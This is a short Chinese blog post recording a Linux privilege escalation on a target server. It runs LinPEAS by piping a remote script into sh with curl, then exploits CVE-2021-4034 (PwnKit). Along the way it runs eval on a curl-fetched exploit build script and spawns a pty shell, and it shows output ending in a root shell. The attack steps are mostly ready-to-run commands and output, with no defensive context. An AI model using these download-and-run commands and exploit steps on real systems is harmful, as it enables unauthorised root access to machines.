LinPEAS 提权

LinPEAS - Linux Privilege Escalation Awesome Script

linxu 提权脚本

https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS


直接使用:

curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh

黄色的要特别注意,扫描到一个,

CVEs Check
Vulnerable to CVE-2021-4034


https://xz.aliyun.com/t/11086

文章提到这个:

https://github.com/Rvn0xsy/CVE-2021-4034


但我用这个代码:

https://github.com/berdav/CVE-2021-4034

没法复现。。。。

gcc: error trying to exec 'cc1': execvp: No such file or directory 错误

发现是服务器问题,编译链不完整。只好找台机器本地编译,

用下面脚本本地编译: eval "$(curl -s https://raw.githubusercontent.com/berdav/CVE-2021-4034/main/cve-2021-4034.sh)"

然后上传到目标机器

python -c "import pty;pty.spawn('/bin/bash')"


bash-4.2$ ./cve-2021-4034
./cve-2021-4034
sh-4.2# whoami
whoami
root


成功!!!


应该是

posted @ 2022-05-31 17:27  katago  阅读(2093)  评论(0)    收藏  举报